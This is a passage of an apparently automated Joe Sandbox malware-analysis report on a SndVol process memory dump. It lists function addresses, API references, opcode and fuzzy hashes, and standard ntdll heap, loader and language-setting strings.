                                                                                                                                                  • Instruction Fuzzy Hash: 0AE01AB16102086BDB14DF49CC84EE737ADEF88654F018155FA0857241C930F8118BF5
                                                                                                                                                  Function 047DA680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 047DA6A8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction ID: 75bf140fc54c7f20595c0c5ea758f77cd40d813613aed76ac7dbe5fbe368bdfe
                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction Fuzzy Hash: D7D012716102147BD624DB98CC85FD777ACDF48654F0180A5BA1C5B241C531FA0086E1
                                                                                                                                                  Function 365D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: efa445de407826bc6d4de3edccc0ec29e3181a409f68008173ba0d2d627ccab2
                                                                                                                                                  • Instruction ID: 73bf0dbeb799fd7579007448ff609eb26696e478dc645786c8e4c563daf83666
                                                                                                                                                  • Opcode Fuzzy Hash: efa445de407826bc6d4de3edccc0ec29e3181a409f68008173ba0d2d627ccab2
                                                                                                                                                  • Instruction Fuzzy Hash: 52B09272D429C5DAEA02E7644A08B0B7A406BD0751F2AC072E303064AE4738C5D5E6BA
                                                                                                                                                  Function 047DA632 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 047DA6A8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: 247e62f42c2a364c0b1454b2bcbd5202a25f483fc493fdbdd7d9eede7275242b
                                                                                                                                                  • Instruction ID: 23cfd5fa0b5656501c9b7f342e14d38f56b7d2927746224a89688aae5541c7d6
                                                                                                                                                  • Opcode Fuzzy Hash: 247e62f42c2a364c0b1454b2bcbd5202a25f483fc493fdbdd7d9eede7275242b
                                                                                                                                                  • Instruction Fuzzy Hash: A5A0029455111477C40025A95D55DB7756C58865447875A64F41AB0202E419B36130F9

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 3658D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/[6$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                  • API String ID: 0-321197408
                                                                                                                                                  • Opcode ID: b9d747a309794140b66be9e5d24d350b2a14563df07c936cdd811fc34e024dbb
                                                                                                                                                  • Instruction ID: a276a268a8a6984f68a6db3c4293d59105ab2e162e10641f9292c8de854f0096
                                                                                                                                                  • Opcode Fuzzy Hash: b9d747a309794140b66be9e5d24d350b2a14563df07c936cdd811fc34e024dbb
                                                                                                                                                  • Instruction Fuzzy Hash: 54B18DB6A083559FE711CF25C880A5BB7E8AF84798F414A3EF988D7250D770D948CF92
                                                                                                                                                  Function 366412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                  • API String ID: 0-3591852110
                                                                                                                                                  • Opcode ID: 8752e9f730f4534b9a6d272dcf6ece9e89a5fae2de504173625fcd777ab4da53
                                                                                                                                                  • Instruction ID: 27ce53d99a67a09aa818ae7ca9ada7e1943c0009ee49257ffce04e1811e4e073
                                                                                                                                                  • Opcode Fuzzy Hash: 8752e9f730f4534b9a6d272dcf6ece9e89a5fae2de504173625fcd777ab4da53
                                                                                                                                                  • Instruction Fuzzy Hash: 5112CD74A00745EFE716AF26C840BB6FFF1EF09388F5484A9E4958BA51D734E880CB91
                                                                                                                                                  Function 3658D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3658D0CF
                                                                                                                                                  • H/[6, xrefs: 365EA843
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3658D2C3
                                                                                                                                                  • @, xrefs: 3658D2AF
                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3658D262
                                                                                                                                                  • @, xrefs: 3658D0FD
                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3658D146
                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3658D196
                                                                                                                                                  • @, xrefs: 3658D313
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/[6$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                  • API String ID: 0-1884362703
                                                                                                                                                  • Opcode ID: d07b637d3853d7176b66f5b45c15923cf2c9d62f2b39d7d63cb39d7867fa871c
                                                                                                                                                  • Instruction ID: 4fe1082591d201bf789863c0d7707151bf41b6612b4511713dd13b517fe7a1d2
                                                                                                                                                  • Opcode Fuzzy Hash: d07b637d3853d7176b66f5b45c15923cf2c9d62f2b39d7d63cb39d7867fa871c
                                                                                                                                                  • Instruction Fuzzy Hash: 3BA13B729083559FE711CF25C880B9BB7E8BB84759F504A3EE99897240DB74D908CF93
                                                                                                                                                  Function 36629179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                  • API String ID: 2994545307-3063724069
                                                                                                                                                  • Opcode ID: ba123659c0db2b06412c789cab9d7d6910b7659b534906c637715bcb812a285b
                                                                                                                                                  • Instruction ID: d2c470e36b4c28a2c57d63e17e3f2508974658345aa7a17da64c2df081db746a
                                                                                                                                                  • Opcode Fuzzy Hash: ba123659c0db2b06412c789cab9d7d6910b7659b534906c637715bcb812a285b
                                                                                                                                                  • Instruction Fuzzy Hash: 44D191B2805315AFE721CE56C880B5BBBE8AFC4794F804A29F994A7150D774C948CFD7
                                                                                                                                                  Function 3658F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                  • Opcode ID: 93d4c334f03bf086322ab7f4aafc7905ad63250aaaaa8d8dee51aca99edc5ac1
                                                                                                                                                  • Instruction ID: 880d3339cb0a46a45c7020c4a0645d1d338f7871749135eb972f017795d131d0
                                                                                                                                                  • Opcode Fuzzy Hash: 93d4c334f03bf086322ab7f4aafc7905ad63250aaaaa8d8dee51aca99edc5ac1
                                                                                                                                                  • Instruction Fuzzy Hash: 8C420D756183819FE701CF29C880A6ABBE5FF88388F54497DE895CB651DB34E881CF52
                                                                                                                                                  Function 365B51EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: H/[6$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 0-92358325
                                                                                                                                                  • Opcode ID: 461d7d23328a58a87810dcb77eccd2faddf6656866406e7cee441729e074b981
                                                                                                                                                  • Instruction ID: 50fbc4cf2807fe2d0d83f815569a61ba317483f19815d20d4f4e0edc9cfff323
                                                                                                                                                  • Opcode Fuzzy Hash: 461d7d23328a58a87810dcb77eccd2faddf6656866406e7cee441729e074b981
                                                                                                                                                  • Instruction Fuzzy Hash: 13F14DB6D10229EFDF06CF99CD80A9EBBB9EF48650F50447AE501EB250D6759E01CFA0
                                                                                                                                                  Function 365AB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                  • Opcode ID: 0097804649ab0336cab9d6d50c8784edf1dbb28d5227bc99ab4f23fd51943638
                                                                                                                                                  • Instruction ID: d49ed5371e0f3a1aa0b420a7793cc391be5bc9f421809243fdf0e8223fc1cb87
                                                                                                                                                  • Opcode Fuzzy Hash: 0097804649ab0336cab9d6d50c8784edf1dbb28d5227bc99ab4f23fd51943638
                                                                                                                                                  • Instruction Fuzzy Hash: B2C12771E20315ABEB168F65CC80B7E7BB5AF85348F5441BAE881AF290EB74C944C7D1
                                                                                                                                                  Function 3663F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                  • API String ID: 0-1745908468
                                                                                                                                                  • Opcode ID: 4d4952972a842906228183f7d17ea0a847f66a6b85c0c3099aa8df41c9d94b07
                                                                                                                                                  • Instruction ID: 982b19f275eca3f2319c7e77eab0a9045b1f59ea8e50e1e929a36a64716e6965
                                                                                                                                                  • Opcode Fuzzy Hash: 4d4952972a842906228183f7d17ea0a847f66a6b85c0c3099aa8df41c9d94b07
                                                                                                                                                  • Instruction Fuzzy Hash: AA916335A02344EFDB02CFAAC840A9DBBF6FF49784F648069E445AB671CB349840CB56
                                                                                                                                                  Function 365BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 366002BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 3660031E
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 366002E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: a81202d73b2b6fab285dd6fa15c5f8974846838b496e015231185b03743dc3ee
                                                                                                                                                  • Instruction ID: 3f7f1fde8cc13e790ad509e1dbd1b3a1450d6759875453322fe9dd85dd9ee1f9
                                                                                                                                                  • Opcode Fuzzy Hash: a81202d73b2b6fab285dd6fa15c5f8974846838b496e015231185b03743dc3ee
                                                                                                                                                  • Instruction Fuzzy Hash: D5E1A174A087419FE715CF69C880B1AB7E0BB88394F204A7DF5A4C72D1DB74D945CB92
                                                                                                                                                  Function 365BD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1975516107
                                                                                                                                                  • Opcode ID: 427f256de0d602f9f6218e437f481ccccda52c5c24a7dd4058416e33dd63e5aa
                                                                                                                                                  • Instruction ID: 3148a195a0aa1cf14ef77253106e920d000702052849d54987d0c974f6e70642
                                                                                                                                                  • Opcode Fuzzy Hash: 427f256de0d602f9f6218e437f481ccccda52c5c24a7dd4058416e33dd63e5aa
                                                                                                                                                  • Instruction Fuzzy Hash: 4151DE75E04349AFEB05CFA4C89479DBBB2BF48358F644279E904BB281D775A842CF81
                                                                                                                                                  Function 366411A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: This is located in the %s field of the heap header.$ -X6`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                  • API String ID: 2994545307-3831304273
                                                                                                                                                  • Opcode ID: c8d46ce60f567171e3e539ae8ddbd6f50b642229c2b51457669e014c6cb4dea3
                                                                                                                                                  • Instruction ID: 6abcd1e7c201610d5eb5a312831ae569acc4717a781198392dcfdfe40cae9797
                                                                                                                                                  • Opcode Fuzzy Hash: c8d46ce60f567171e3e539ae8ddbd6f50b642229c2b51457669e014c6cb4dea3
                                                                                                                                                  • Instruction Fuzzy Hash: 2E31F575600214EFE712DFAACC80F67BBE9FF467A4F5000A5F541DB690DA30D980CA56
                                                                                                                                                  Function 365876B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                  • API String ID: 0-3061284088
                                                                                                                                                  • Opcode ID: c0c62d359fe9b16318e6f51b562f72e0a602fca8b25e52dcc5ec742e3ff9ef4b
                                                                                                                                                  • Instruction ID: fb54646c0a9d6c74e0a90435cf3cd5d6779f1f72e53e5e7d9f898d84bd459462
                                                                                                                                                  • Opcode Fuzzy Hash: c0c62d359fe9b16318e6f51b562f72e0a602fca8b25e52dcc5ec742e3ff9ef4b
                                                                                                                                                  • Instruction Fuzzy Hash: 4801FC36515194EFE3159F26D90DF927BF8DF827B4F2440B9E01057A61CAA8E880C965
                                                                                                                                                  Function 365A70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                  • Opcode ID: 9f16d3ea110c7f2d571ef3f9fc10c34ae3534abf63f6f621d2adf2ea8ddb3f96
                                                                                                                                                  • Instruction ID: 4395456cc2b943da6827d1d167910464ccbd7fac581c7a3d79f4b53da91a643e
                                                                                                                                                  • Opcode Fuzzy Hash: 9f16d3ea110c7f2d571ef3f9fc10c34ae3534abf63f6f621d2adf2ea8ddb3f96
                                                                                                                                                  • Instruction Fuzzy Hash: E513ACB8E003559FEB16CF69C8947ADBBF1BF48304F2485A9D849AB381D734A945CF90
                                                                                                                                                  Function 365A1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 2994545307-3570731704
                                                                                                                                                  • Opcode ID: d9df10f30dab9cac279c60ab95a6665e656c15945a5d69516e63ec5948d64894
                                                                                                                                                  • Instruction ID: dc89d4d738f136da460f8f099546c9eed7ec70b4951054b9e260fa104c0c156c
                                                                                                                                                  • Opcode Fuzzy Hash: d9df10f30dab9cac279c60ab95a6665e656c15945a5d69516e63ec5948d64894
                                                                                                                                                  • Instruction Fuzzy Hash: 56924975E11329CFEB25CF29CC40B99BBB6AF45394F1581E9D949AB280D7309E80CF51
                                                                                                                                                  Function 3659BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
